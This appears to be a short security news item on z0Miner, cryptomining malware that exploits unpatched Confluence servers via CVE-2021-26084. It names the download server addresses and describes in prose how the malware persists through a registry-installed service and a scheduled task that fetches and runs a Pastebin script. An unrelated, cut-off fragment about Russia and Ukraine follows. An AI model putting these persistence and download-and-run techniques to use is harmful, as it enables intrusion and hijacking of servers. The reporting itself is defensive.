Researchers at Trend Micro published a report on Tuesday that z0Miner, a prolific malware threat that abuses compromised systems to mine cryptocurrency, has started using the recently-disclosed vulnerability CVE-2021-26084 to exploit Atlassian Confluence servers that have not had the latest security patch installed. Once the vulnerable servers are exploited, z0Miner downloads a PowerShell script, batch files, and a DLL file from servers at IP addresses 188.8.131.52 (Netherlands) and 184.108.40.206 (South Korea). The malware uses “reg add” commands in a Windows batch file to directly manipulate the Windows registry of the victim servers in order to install a new service named “Hyper-V Guest Virtualization Service” – the service installation will ensure that the malware runs whenever the server is restarted. Another of the malware’s scripts uses the “schtasks /create” command to install a service named “.NET Framework NGEN v4.0.30319 32” that actually uses PowerShell to download a malicious script that was hosted on Pastebin.com and execute it every five minutes. The Pastebin security team has already removed the project hosting the malicious script.
By Anthony Zampino Introduction Leading up to the most recent Russian invasion of Ukraine in